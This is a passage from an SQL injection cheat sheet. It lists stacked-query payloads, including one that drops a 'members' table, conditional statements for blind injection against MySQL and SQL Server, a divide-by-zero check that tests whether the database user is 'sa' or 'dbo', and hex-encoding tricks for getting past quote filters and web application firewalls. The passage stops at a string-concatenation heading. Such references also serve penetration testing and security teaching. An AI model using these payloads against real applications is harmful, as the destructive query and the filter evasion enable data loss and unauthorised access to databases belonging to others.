Sql Injection Cheat Sheet Page 4

not possible to execute second query in PHP-MySQL applications or maybe MySQL
client supports this, not quite sure. Can someone clarify?
Stacked SQL Injection Attack Samples
ID: 10;DROP members --
SELECT * FROM products WHERE id = 10; DROP members--
This will run the DROP members statement after the normal SQL query.
If Statements
Get a response based on an if statement. This is one of the key points of Blind SQL Injection; it can also be very useful for testing simple things blindly and accurately.
MySQL If Statement
(M) IF(condition,true-part,false-part)
SELECT IF(1=1,'true','false')
SQL Server If Statement
(S) IF condition true-part ELSE false-part
IF (1=1) SELECT 'true' ELSE SELECT 'false'
If Statement SQL Injection Attack Samples
(S) if ((select user) = 'sa' OR (select user) = 'dbo') select 1 else select 1/0
This will throw a divide-by-zero error if the currently logged-in user is not "sa" or "dbo".
Using Integers
Very useful for bypassing magic_quotes() and similar filters, or even WAFs.
(SM) 0xHEXNUMBER
You can write hex like these:
(S) SELECT CHAR(0x66)
(M) SELECT 0x5045 (this is not an integer; it will be a string built from the hex)
(M) SELECT 0x50 + 0x45 (this is an integer now!)
String Operations
String-related operations. These can be quite useful for building injections that do not use any quotes, for bypassing other blacklisting, or for determining the back-end database.
String Concatenation
